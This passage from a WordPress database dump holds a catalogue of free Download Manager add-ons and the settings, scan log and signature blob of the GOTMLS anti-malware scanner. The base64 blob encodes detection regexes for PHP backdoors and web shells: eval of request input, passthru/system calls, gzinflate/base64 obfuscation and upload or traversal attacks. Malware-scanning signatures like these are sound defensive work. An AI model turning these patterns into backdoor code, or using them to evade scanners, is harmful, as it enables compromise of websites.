Templates\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-button-templates1-200x200.png\",\"excerpt\":\"WPDM Button Templates will add an additional short-code code with WordPress Down...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"ui-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-button-templates\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15739\":{\"ID\":15739,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-page-templates\\/\",\"pinfo\":{\"version\":\"\"},\"price\":\"0.00\",\"files\":[\"wpdm-page-template.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-page-templates\\/\",\"currency\":\"$\",\"title\":\"WPDM Page Templates\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-page-templates1-200x200.png\",\"excerpt\":\"WPDM Page Templates add-on will help you to apply page type templates ( like ful...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"ui-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-page-templates\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15733\":{\"ID\":15733,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-image-button\\/\",\"pinfo\":{\"version\":\"2.3.3\"},\"price\":\"0.00\",\"files\":[\"wpdm-download-button.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-image-button\\/\",\"currency\":\"$\",\"title\":\"WPDM Image Button\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-image-button-200x200.png\",\"excerpt\":\"WPDM - Image Button add-on will help you to replace the text (link label) in dow...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"ui-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-image-button\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15747\":{\"ID\":15747,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-colorbox\\/\",\"pinfo\":{\"version\":\"1.0.0\"},\"price\":\"0.00\",\"files\":[\"wpdm-colorbox.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-colorbox\\/\",\"currency\":\"$\",\"title\":\"WPDM ColorBox\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-colorbox1-200x200.png\",\"excerpt\":\"WPDM Colorbox add-on will show the additional previews using jquery color box pl...\",\"cats\":[\"add-ons\",\"free-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-colorbox\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15691\":{\"ID\":15691,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-extended-short-codes\\/\",\"pinfo\":{\"version\":\"2.8.1\"},\"price\":\"0.00\",\"files\":[\"\\/home\\/wpdownlo\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/\\/wpdm-extended-shortcodes.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-extended-short-codes\\/\",\"currency\":\"$\",\"title\":\"WPDM Extended Short-codes\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-extended-shortcode-200x200.png\",\"excerpt\":\"WPDM Extended Short-codes add-on will give you better experience in using WordPr...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-extended-short-codes\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15665\":{\"ID\":15665,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\",\"pinfo\":{\"version\":\"2.7.0\"},\"price\":\"0.00\",\"files\":[\"\\/home\\/wpdownlo\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/\\/wpdm-tinymce-button.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\",\"currency\":\"$\",\"title\":\"Advanced TinyMCE button\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/tinymce-button-200x200.png\",\"excerpt\":\"Advanced TinyMCE button add-on will add a button with tinymce editor from where ...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15671\":{\"ID\":15671,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package-wordpress-digital-store-solution\\/\",\"pinfo\":{\"version\":\"3.8.5\"},\"price\":\"0.00\",\"files\":[\"wpdm-premium-packages.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package-wordpress-digital-store-solution\\/\",\"currency\":\"$\",\"title\":\"Premium Package &#8211; WordPress Digital Store Solution\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-premium-package-200x200.png\",\"excerpt\":\"WordPress Digital Store Solution - Premium Package add-on adds pricing and licen...\",\"cats\":[\"add-ons\",\"ecommerce-add-ons\",\"featured-add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package-wordpress-digital-store-solution\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"}}}','yes'),(55080,'GOTMLS_settings_array','a:11:{s:12:\"msg_position\";a:4:{i:0;s:4:\"80px\";i:1;s:4:\"40px\";i:2;s:5:\"400px\";i:3;s:5:\"600px\";}s:9:\"scan_what\";i:2;s:10:\"scan_depth\";i:-1;s:11:\"exclude_ext\";a:28:{i:0;s:3:\"png\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"gif\";i:4;s:3:\"bmp\";i:5;s:3:\"tif\";i:6;s:4:\"tiff\";i:7;s:3:\"psd\";i:8;s:3:\"svg\";i:9;s:3:\"ico\";i:10;s:3:\"doc\";i:11;s:4:\"docx\";i:12;s:3:\"ttf\";i:13;s:3:\"fla\";i:14;s:3:\"flv\";i:15;s:3:\"mov\";i:16;s:3:\"mp3\";i:17;s:3:\"pdf\";i:18;s:3:\"css\";i:19;s:3:\"pot\";i:20;s:2:\"po\";i:21;s:2:\"mo\";i:22;s:2:\"so\";i:23;s:3:\"exe\";i:24;s:3:\"zip\";i:25;s:2:\"7z\";i:26;s:2:\"gz\";i:27;s:3:\"rar\";}s:12:\"check_custom\";s:0:\"\";s:11:\"exclude_dir\";a:0:{}s:8:\"user_can\";s:16:\"activate_plugins\";s:10:\"scan_level\";i:3;s:5:\"check\";a:4:{i:0;s:8:\"htaccess\";i:1;s:8:\"timthumb\";i:2;s:8:\"backdoor\";i:3;s:5:\"known\";}s:10:\"dont_check\";a:0:{}s:15:\"skip_quarantine\";i:0;}','yes'),(55084,'GOTMLS_scan_log/198.51.197.174/1508372879.4424','a:2:{s:8:\"settings\";a:11:{s:12:\"msg_position\";a:4:{i:0;s:4:\"80px\";i:1;s:4:\"40px\";i:2;s:5:\"400px\";i:3;s:5:\"600px\";}s:9:\"scan_what\";i:2;s:10:\"scan_depth\";i:-1;s:11:\"exclude_ext\";a:28:{i:0;s:3:\"png\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"gif\";i:4;s:3:\"bmp\";i:5;s:3:\"tif\";i:6;s:4:\"tiff\";i:7;s:3:\"psd\";i:8;s:3:\"svg\";i:9;s:3:\"ico\";i:10;s:3:\"doc\";i:11;s:4:\"docx\";i:12;s:3:\"ttf\";i:13;s:3:\"fla\";i:14;s:3:\"flv\";i:15;s:3:\"mov\";i:16;s:3:\"mp3\";i:17;s:3:\"pdf\";i:18;s:3:\"css\";i:19;s:3:\"pot\";i:20;s:2:\"po\";i:21;s:2:\"mo\";i:22;s:2:\"so\";i:23;s:3:\"exe\";i:24;s:3:\"zip\";i:25;s:2:\"7z\";i:26;s:2:\"gz\";i:27;s:3:\"rar\";}s:12:\"check_custom\";s:0:\"\";s:11:\"exclude_dir\";a:0:{}s:8:\"user_can\";s:16:\"activate_plugins\";s:10:\"scan_level\";i:3;s:5:\"check\";a:4:{i:0;s:8:\"htaccess\";i:1;s:8:\"timthumb\";i:2;s:8:\"backdoor\";i:3;s:5:\"known\";}s:10:\"dont_check\";a:0:{}s:15:\"skip_quarantine\";i:0;}s:4:\"scan\";a:5:{s:3:\"dir\";s:27:\"/home4/zphiblgz/public_html\";s:5:\"start\";i:1508372958;s:4:\"type\";s:13:\"Complete Scan\";s:9:\"microtime\";d:1119;s:7:\"percent\";i:0;}}','yes'),(55082,'GOTMLS_Installation_Keys','s:74:\"a:1:{s:32:\"7ff85b98c5471215593969a8868e33e4\";s:20:\"https://zphiblgz.org\";}\";','yes'),(55083,'GOTMLS_definitions_blob','YTo4OntzOjk6InBvdGVudGlhbCI7YToxNTp7czo=OiJldmFsIjthOjI6e2k6MDtzOjU6IkVBUExxIjtpOjE7czozNToiL1teYS16XC8nIl1ldmFsXChbXlwpXStbJyJcc1wpO1=rL2kiO31zOjk6ImF1dGhfcGFzcyI7YToyOntpOjA7czo1OiJIMU45WSI7aToxO3M6MjE6Ii9cJGF1dGhfcGFzc1xzKj=uKzsvaSI7fXM6MjE6ImRvY3VtZW5=LndyaXRlIGlmcmFtZSI7YToyOntpOjA7czo1OiJIMVBBTyI7aToxO3M6NTI6Ii9kb2N1bWVudFwud3JpdGVcKChbJyJdKTxpZnJhbWUgLis8XC9pZnJhbWU-XDFcKTsqL2kiO31zOjE1OiJwcmVnX3JlcGxhY2UgL2UiO2E6Mjp7aTowO3M6NToiRzg1RjIiO2k6MTtzOjQ3OiIvcHJlZ19yZXBsYWNlXHMqXCguK1tcL1wjXHxdW2ldKmVbaV=qWyciXS4rXCkvaSI7fXM6MjA6ImV4ZWMgc3lzdGVtIHBhc3N=aHJ1IjthOjI6e2k6MDtzOjU6IkVBUExnIjtpOjE7czo1MToiLzxcPy4rP2V4ZWNcKC4rP3N5c3RlbVwoLis_cGFzc3RocnVcKC4rZndyaXRlXCguKy9zIjt9czoyOToiRXh=ZXJuYWwgUmVkaXJlY3QgUmV3cml=ZVJ1bGUiO2E6Mjp7aTowO3M6NToiRjFVSVoiO2k6MTtzOjQyOiIvUmV3cml=ZVJ1bGUgW14gXSsgaHR=cFw6XC9cLyg_ITEyN1wuKS4qL2kiO31zOjM1OiJubyBlcnJvcl9yZXBvcnRpbmcgbG9uZyBsaW5lcyBhbG9uZSI7YToyOntpOjA7czo1OiJIMlM4aiI7aToxO3M6NzQ6Ii88XD9bXHNocF=qXEA_ZXJyb3JfcmVwb3J=aW5nXCgwXCk7Lis_W2EtejAtOVwvXC1cPSciXC5dezIwMDB9Lio_KCR8XD8-KS9pIjt9czoyMjoicHJvdGVjdGVkIGJ5IGNvcHlyaWdodCI7YToyOntpOjA7czo1OiJEOE1DdyI7aToxO3M6MTM2OiIvXC9cKiBUaGlzIGZpbGUgaXMgcHJvdGVjdGVkIGJ5IGNvcHlyaWdodCBsYXcgYW5kIHByb3ZpZGVkIHVuZGVyIGxpY2Vuc2UuIFJldmVyc2UgZW5naW5lZXJpbmcgb2YgdGhpcyBmaWxlIGlzIHN=cmljdGx5IHByb2hpYml=ZWQuIFwqXC8vIjt9czoxOToiYSBzcGFuIGNvbG9yIEYxRUZFNCI7YToyOntpOjA7czo1OiJEOFJBUCI7aToxO3M6MTE4OiIvXDxhIFteXD5dK1w-XDxzcGFuIHN=eWxlPSJjb2xvclw6XCNGMUVGRTQ7Ilw-KC4rPylcPFwvc3Bhblw-XDxcL2FcPlw8c3BhbiBzdHlsZT=iY29sb3JcOlwjRjFFRkU=OyJcPiguKz8pXDxcL3NwYW5cPi9pIjt9czoxNzoiVmFyaWFibGUgRnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiRTg1NkwiO2k6MTtzOjY3OiIvKDwhXGQpXCRbXCRce1=qW2EtelwtXF8wLTldK1tcfSBcdF=qKFxbW15cXV=rXF1bIFx=XSopKlwoLio_XClcOy9pIjt9czoxMToiVGFnZ2VkIENvZGUiO2E6Mjp7aTowO3M6NToiRTRMTUciO2k6MTtzOjI=OiIvXCMoXHcrKVwjLis_XCNcL1wxXCMvaXMiO31zOjE1OiJjcmVhdGVfZnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiRzFNRmUiO2k6MTtzOjc4OiIvKFwkW2Etel8wLTldK1s9XHNcQF=rKT9jcmVhdGVfZnVuY3Rpb25cKFteLF=rLFtcc1wkXC5cW1xdYS16XzAtOV=rW1xzXCldKzsqL2kiO31zOjQzOiJmdW5jdGlvbiBhZGRfYWN=aW9uIHdwX2VucXVldWVfc2NyaXB=IGpzb24yIjthOjI6e2k6MDtzOjU6IkYxMTR2IjtpOjE7czoxNzoiL2pzb24yXC5taW5cLmpzL2kiO31zOjQ3OiJSZXdyaXRlQ29uZCBIVFRQX1VTRVJfQUdFTlQgUmV3cml=ZVJ1bGUgaHR=cCBJUCI7YToyOntpOjA7czo1OiJGMjc3aCI7aToxO3M6ODQ6Ii8oUmV3cml=ZUNvbmQgXCVce=hUVFBfVVNFUl9BR=VOVFx9IC4rXHMrKStSZXdyaXRlUnVsZSBcXi4qXCQgaHR=cDpcL1wvKD8hMTI3XC4pLiovaSI7fXM6MTI6InRpdGxlIGhhY2tlZCI7YToyOntpOjA7czo1OiJIMlM4bSI7aToxO3M6Mjc6Ii88dGl=bGU-W148XSpoYWNrWzNlXVtyZF=vaSI7fX1zOjg6ImZpcmV3YWxsIjthOjM6e3M6OToiUmV2U2xpZGVyIjthOjc6e2k6MDtzOjU6IkdCS=ZyIjtpOjE7czozNjoiUmV2b2x1dGlvbiBTbGlkZXIgRXhwbG9pdCBQcm9=ZWN=aW9uIjtpOjI7czo=MTM6IlRoaXMgcHJvdGVjdGlvbiBpcyBhdXRvbWF=aWNhbGx5IGFjdGl2YXRlZCBiZWNhdXNlIG9mIHRoZSB3aWRlc3ByZWFkIGF=dGFja3Mgb24gV29yZFByZXNzIHRoYXQgaGF2ZSBhZmZlY3RlZCBzbyBtYW55IHNpdGVzLiBJdCBpcyBzdGlsbCByZWNvbW1lbmRlZCB=aGF=IHlvdSBtYWtlIHN1cmUgdG8gdXBncmFkZSBhbnkgb2xkZXIgdmVyc2lvbnMgb2YgdGhlIFJldm9sdXRpb24gU2xpZGVyIHBsdWdpbiwgZXNwZWNpYWxseSB=aG9zZSBpbmNsdWRlZCBpbiB=aGVtZXMgdGhhdCB3aWxsIG5vdCB1cGRhdGUgYXV=b21hdGljYWxseS4gRXZlbiBpZiB5b3UgZG9uJ3QgdGhpbmsgeW91IGhhdmUgUmV2b2x1dGlvbiBTbGlkZXIgb24geW91ciBzaXRlIGl=IGRvZW4ndCBodXJ=IHRvIGhhdmUgdGhpcyBwcm9=ZWN=aW9uIGVuYWJsZWQuIjtpOjM7czo2OiJTRVJWRVIiO2k6NDtzOjIwOiIvXC9hZG1pbi1hamF4XC5waHAvaSI7aTo1O3M6NzoiUkVRVUVTVCI7aTo2O3M6MTE5OiIvXCZpbWc9W15cJl=qKD88IVwucG5nKSg_PCFcLmpwZykoPzwhXC5qcGVnKSg_PCFcLmdpZikoPzwhXC5ibXApKD88IVwudGlmKSg_PCFcLnRpZmYpKD88IVwucHNkKSg_PCFcLnN2ZykoPzwhXC5pY28pXCYvaSI7fXM6OToiVHJhdmVyc2FsIjthOjU6e2k6MDtzOjU6IkdCS=M4IjtpOjE7czozMDoiRGlyZWN=b3J5IFRyYXZlcnNhbCBQcm9=ZWN=aW9uIjtpOjI7czoyMTY6IlRoaXMgcHJvdGVjdGlvbiBpcyBhdXRvbWF=aWNhbGx5IGFjdGl2YXRlZCBiZWNhdXNlIHRoaXMgdHlwZSBvZiBhdHRhY2sgaXMgcXVpdGUgY29tbW9uLiBUaGlzIHByb3RlY3Rpb24gY2FuIHByZXZlbnQgaGFja2VycyBmcm9tIGFjY2Vzc2luZyBzZWN1cmUgZmlsZXMgaW4gcGFyZW5=IGRpcmVjdG9yaWVzIChvciB1c2VyJ3MgZm9sZGVycyBvdXRzaWRlIHRoZSBzaXRlX3Jvb3QpLiI7aTozO3M6NzoiUkVRVUVTVCI7aTo=O3M6MjI6Ii89W1xzXC9dKihcLlwufGV=YylcLy8iO31zOjk6IlVwbG9hZFBIUCI7YTo1OntpOjA7czo1OiJHQ=9BVCI7aToxO3M6MjY6IlVwbG9hZCBQSFAgRmlsZSBQcm9=ZWN=aW9uIjtpOjI7czoxNzc6IlRoaXMgcHJvdGVjdGlvbiBpcyBhdXRvbWF=aWNhbGx5IGFjdGl2YXRlZCBiZWNhdXNlIHRoaXMgdHlwZSBvZiBhdHRhY2sgaXMgZXh=cmVtZWx5IGRhbmdlcm91cy4gVGhpcyBwcm9=ZWN=aW9uIGNhbiBwcmV2ZW5=IGhhY2tlcnMgZnJvbSB1cGxvYWRpbmcgbWFsaWNpb3VzIGNvZGUgdmlhIHdlYiBzY3JpcHRzLiI7aTozO3M6NToiRklMRVMiO2k6NDtzOjIwOiIvbmFtZT1bXlwmXSpcLnBocFwmLyI7fX1zOjg6ImJhY2tkb29yIjthOjU4OntzOjIxOiJzaGVsbCBzeXN=ZW=gcGFzc3RocnUiO2E6Mjp7aTowO3M6NToiRDhESjkiO2k6MTtzOjk5OiIvXDxcPyguKz8pKHNoZWxsfGF1dGhwKSguKz8pZXJyb3JfcmVwb3J=aW5nXCgwXCkoLis_KXNldF9=aW1lX2xpbWl=XCgwXCkoLis_KWluaV9zZXRcKC4rZm9wZW5cKC4rL3MiO31zOjI2OiJHRVRkb19yZW1vdmUgc2FmZV9tb2RlIGVuZCI7YToyOntpOjA7czo1OiJDQ1VMMyI7aToxO3M6MTE=OiIvaWZcKFwkX=dFVFxbJ2RvJ1xdPT=icmVtb3ZlIlwpXHtcbnVubGlua1woZ2V=Y3dkXChcKVwuXCRfU=VSVkVSXFsiU=NSSVBUX=5BTUUiXF1cKTsuK3NhZmVfbW9kZS4rZWxzZS4rJ1wuXCRlbmQ7L3MiO31zOjQwOiJzZXRfZXJyb3JfaGFuZGxlciBldmFsIGZpbGVfZ2V=X2NvbnRlbnRzIjthOjI6e2k6MDtzOjU6IkY5UzlXIjtpOjE7czoxMjQ6Ii8oZXJyb3JfcmVwb3J=aW5nXCguKz98c2V=X2Vycm9yX2hhbmRsZXJcKC4rPykqZXZhbFwoW15cKV=qPyhcJHJlcXVlc3R8c3RycmV2XCgpW15cKV=qP2ZpbGVfZ2V=X2NvbnRlbnRzXCgnW14nXSsnW1wpXHNdKzsvaXMiO31zOjE4OiJldmFsIFJFUVVFU1QgYWxvbmUiO2E6Mjp7aTowO3M6NToiRjRQTFAiO2k6MTtzOjE2MjoiLzxcP1twaFxzXSsoKFwkW2EtelxfMC=5XSspXHMqPVxzKlwkXyhSRVFVRVN8R=V8UE9TKVRbXjtdKztccyopP1xAP2V2YWwoW1woXHMqXEBdK3N=cmlwc2xhc2hlcyk_W1woXHMqXEBdKyhcMnxcJF8oUkVRVUVTfEdFfFBPUylUXHMqKFxbW15cXV=rXF1ccyopKylbXCk7XHNdK1w_Pi9pIjt9czoxODoiZnVuY3Rpb24gQlNTViBldmFsIjthOjI6e2k6MDtzOjU6IkQ=TkNDIjtpOjE7czo2OToiLyhcL1wqLio_XCpcL1tcclxuIFx=XSopKmZ1bmN=aW9uIEJTU1ZcKC4rZXZhbFwoQlNTVlwoLis_W1wpXStbO1=qL2lzIjt9czoyMzoiRmlsZXNNYW4gcHJlZ19yZXBsYWNlIC4iO2E6Mjp7aTowO3M6NToiRUNGSHMiO2k6MTtzOjI=NjoiLzxcP1twaFxzXSooXC9cKi4rP1wqXC9ccyopKihcJFthLXpcXzAtOV=rXHMqPVteO1=rO1xzKikqXCRbYS16XF8wLTldK1xzKj1bXHMiJ1=qRlsiJ1wuXHNdKmlbIidcLlxzXSpsWyInXC5cc1=qZVsiJ1wuXHNdKnNbIidcLlxzXSpNWyInXC5cc1=qYVsiJ1wuXHNdKm5bIidcc1=qOyhccypcJFthLXpcXzAtOV=rXHMqPVteO1=rOykqXHMqKFwkW2EtelxfMC=5XSt8cHJlZ19yZXBsYWNlKVwoW15cKV=qW1wpO1xzXSsoJHxcPz4pL2lzIjt9czoyOToiaWYgaXNzZXQgUkVRVUVTVCBldmFsIFJFUVVFU1QiO2E6Mjp7aTowO3M6NToiRjdVRFAiO2k6MTtzOjIyOToiL2lmW1xzXChdK2lzc2V=W1xzXChdK1wkXyhSRVFVRVN8R=V8UE9TKVQoXChbXlwpXSpcKSt8XFtbXlxdXSpcXSt8XHtbXlx9XSpcfSspKlteXHtdK1tce1xzXStldmFsW1xzXChdKyhbYS16XzAtOV=rXChccyopKlwkXyhSRVFVRVN8R=V8UE9TKVQoXChbXlwpXSpcKSt8XFtbXlxdXSpcXSt8XHtbXlx9XSpcfSspKltcc1wpO1=rKChkaWV8ZXhpdHxlY2hvfHByaW5=KVteO1=qO1xzKikqXH1bO1xzXSsvaSI7fXM6MzI6ImVycm9yX3JlcG9ydGluZyBwYXNzd29yZCBleGl=IG1lIjthOjI6e2k6MDtzOjU6IkQ1QkJrIjtpOjE7czoxNzI6Ii88XD8ocGhwKT9bXHJcbiBcdF=qZXJyb3JfcmVwb3J=aW5nXCgwXCk7W1xyXG4gXHRdKlwvXC9JZiB=aGVyZSBpcyBhbiBlcnJvciwgd2UnbGwgc2hvdyBpdCwga1w_W1xyXG4gXHRdKlwkcGFzc3dvcmRbPSBcdF=rLisgOi1cKVtcclxuIFx=XSpleGl=XChcKTtbXHJcbiBcdF=qXD8-XC5cJG1lXC4vaXMiO31zOjI4OiJwaHAgU3RhcnRpbmcgY2FsbHMgYzk5c2hleGl=IjthOjI6e2k6MDtzOjU6IkQ1REg3IjtpOjE7czoxMDY6Ii88XD8ocGhwKSpbXHJcbiBcdF=rXC9cL1N=YXJ=aW5nIGNhbGxzLitjaGRpclwoXCRsYXN=ZGlyXClbO1xyXG4gXHRdK1thLXowLTldK2V4aXRcKFwpWztcclxuIFx=XSooXD8-KSovaXMiO31zOjM1OiJpZiBpc3NldCBSRVFVRVNUIGZvcmVhY2ggYXJyYXkgZXZhbCI7YToyOntpOjA7czo1OiJHM=4wMSI7aToxO3M6MTU5OiIvaWZbXHNcKF=rKFthLXpfMC=5XStccypcKFxzKikqXCRfKFJFUVVFU3xHRXxQT1MpVFxbW15ce1=rXHtccyooXCRbYS16XzAtOV=rXHMqPVteO1=rO1xzKnwuKj9mb3JlYWNoXChhcnJheS4qPykqW1xzXEBdKihzeXN=ZW18ZXZhbClcKC4rXHMqKGV4aXRbXjtdKjtccyopKlx9L2kiO31zOjIwOiJwaHAgcGFzc3dvcmQgaGdfZXhpdCI7YToyOntpOjA7czo1OiJEOEo3ZSI7aToxO3M6NDg6Ii88XD8ocGhwKT8oXHMpK1wkcGFzc3dvcmQoLis_KWhnX2V4aXRcKFwpOyguKykvcyI7fXM6NzI6ImlmIGVtcHR5IFNFUlZFUiBIVFRQX1VTRVJfQUdFTlQgc2V=X3RpbWVfbGltaXQgbW92ZV91cGxvYWRlZF9maWxlIHJldHVybiI7YToyOntpOjA7czo1OiJHOEdCVCI7aToxO3M6MzAzOiIvKDxodG1sLio_PGJvZHk-XHMqKT88XD9bcGhdKlxzKigocHJpbnR8ZWNobylbXjtdKjtccyp8XC9cKlteXCpdKihcKlteXCpcL1=qKStcL1xzKikqaWZbXHNcKFwhXSsoXEA_aXNfdXBsb2FkZWRfZmlsZXxlbXB=eVwoXCRfU=VSVkVSXFtbIiddSFRUUF9VU=VSX=FHRU5UWyInXVxdW1wpXHNdKyguKz8pc2V=X3RpbWVfbGltaXQpLis_bW92ZV91cGxvYWRlZF9maWxlLisocmV=dXJuIFwkW2Etel8wLTldK3x=b3VjaFxzKihcL1wqLio_XCpcL1xzKikqXChbXjtdKyk7W1xzXH1dKygkfFw_Pihccyo8XC8oYm9keXxodG1sKT4pKikvaXMiO31zOjMzOiIvYXV=aF9wYXNzIGxvdmUgc2V=X2Vycm9yX2hhbmRsZXIiO2E6Mjp7aTowO3M6NToiREFNOXIiO2k6MTtzOjkzOiIvXDxcPyg_PS4qXCRhdXRoX3Bhc3MpKD89Lipsb3ZlTG9naW4pKD89Lipsb3Zlc2V=Y29va2llKSg_PS4qc2V=X2Vycm9yX2hhbmRsZXJcKCkuKyhcP1w-KSovaXMiO31zOjQ5OiJmdW5jdGlvbiBnemluZmxhdGUgYmFzZTY=X2RlY29kZSBmb3IgY2hyIG9yZCBldmFsIjthOjI6e2k6MDtzOjU6IkY4Vkd4IjtpOjE7czoyMjE6Ii8oZnVuY3Rpb25ccysoW2Etel8wLTldKylccypcKFxzKihcJFthLXpfMC=5XSspW1wpXHNce1=rXDNbPVxzXStnemluZmxhdGVcKGJhc2U2NF9kZWNvZGVcKC4rW1wpO1xzXSspP2Zvcltcc1woXSsuKz9ce1xzKihcJFthLXpfMC=5XSspW1wuXHNdKj1bXEBcc1=qY2hyXChbXjtdK1s7XHNcfV=rKHJldHVyblteO1=qWztcfVxzXSspP2V2YWxcKChcMlwofFw=KVteXCldKltcKVxzXSs7Ki9pIjt9czoyMjoiZXZhbCBhcnJheV9wb3AgUkVRVUVTVCI7YToyOntpOjA7czo1OiJEQk=5NSI7aToxO3M6NjM6Ii9ldmFsXChbXHRhLXpfMC=5IFwoXSphcnJheV9wb3BcKFwkXyhHRXxQT1N8UkVRVUVTKVRbXCldK1s7XSovaSI7fXM6MjM6ImlmIGZvciB1bnNldCB3cF93cCBmb3JtIjthOjI6e2k6MDtzOjU6IkU4R=JQIjtpOjE7czoxMjQ6Ii8oXCR3cFtfXSt3cFsgXHRdKj1bXjtdKztbXHJcbiBcdF=qKSooaWZ8Zm9yfHVuc2V=KVsgXHRdKlwoXCR3cFtfXSt3cFteO1=rOy4rP1w_Pjxmb3JtLis_bmFtZT1bJyJdd3BbX1=rd3BbJyJdLis_PFwvZm9ybT4vaXMiO31zOjI4OiJhc3NlcnQgSGV4IDY=ZW5jb2RlZFRleHQgSGV4IjthOjI6e2k6MDtzOjU6IkY1MkRFIjtpOjE7czoyOTQ6Ii8oYXNzZXJ=X29wdGlvbnNcKC4rP1wpO1xzKnxmdW5jdGlvbiBbYS16XzAtOV=rXChbXlwpXSpbXClcc1x7XSsuKz9yZXR1cm5bXjtdKls7XH1cc1=rfFwkKGNvbG9yfGF1dGh8cGFzc3xkZWZhdWx=fF9fKVtfXC1cPlwuYS16MC=5XSpccyo9Lis_O1xzKikqKCgoXCRbYS16XzAtOV=rKVxzKj=uKj9cJFwyfChcJFthLXpfMC=5XSspXHMqPS4qP1w1KS4qXHMqKSphc3NlcnRcKFxzKigiKFxceFswLTlBLUZdWzAtOUEtRl=pKydbXC9hLXpcXzAtOVw9XSsnKFxceFswLTlBLUZdWzAtOUEtRl=pKyJ8XDYpW1wpXHNdKzsvaSI7fXM6MjQ6IndlYiBzaGVsbCBmb3BlbiBwYXNzdGhydSI7YToyOntpOjA7czo1OiJFMjY=cSI7aToxO3M6Njk6Ii9eLis_ZXJyb3JfcmVwb3J=aW5nXCguKz93ZWJbIFx=XSpzaGVsbC4rP2ZvcGVuXCguKz9wYXNzdGhydVwoLis_JC9pcyI7fXM6NTc6InBocCBpZiBpc19kaXIgZmlsZV9nZXRfY29udGVudHMgaWYgZmlsZV9wdXRfY29udGVudHMgZWNobyI7YToyOntpOjA7czo1OiJHN=QwVyI7aToxO3M6MzQ1OiIvPFw_W3BoXHNdKyhcL1wvW15cbl=qW1xyXG5dK3xcJFthLXpfMC=5XStccyo9W147XSo7XHMqfGVycm9yX3JlcG9ydGluZ1woW147XSs7XHMqKSsuKz8oaW5jbHVkZVteO1=qd3AtY2xhc3MtaGVhZGVycy5waHAuKz98aWZbXChcc1=raXNfZGlyW15ce1=rXHsoXHMqXCRbYS16XzAtOV=rXHMqPWZpbGVffFteXH1dK1x9XHMqKWdldF8oYWxsX2RpcnNcKC4rP3xjb25=ZW5=c1woW147XSo7XHMqXCRbYS16XzAtOV=rXHMqPVteO1=qO1xzKihpZltcKFxzXSspPykpZmlsZV9wdXRfY29udGVudHNcKC4rPygodG91Y2hcKC4rfGVjaG9bXjtdKjtccyp8XH=oXHMqZWxzZVtcc1x7XSspPylccyopKygkfFw_PikvaXMiO31zOjUzOiJ2YXIgZnVuY3Rpb25zIHJldHVybiBuZXcgUmVjdXJzaXZlQXJyYXlJdGVyYXRvciBhcnJheSI7YToyOntpOjA7czo1OiJFMjY2YyI7aToxO3M6MTkxOiIvKFw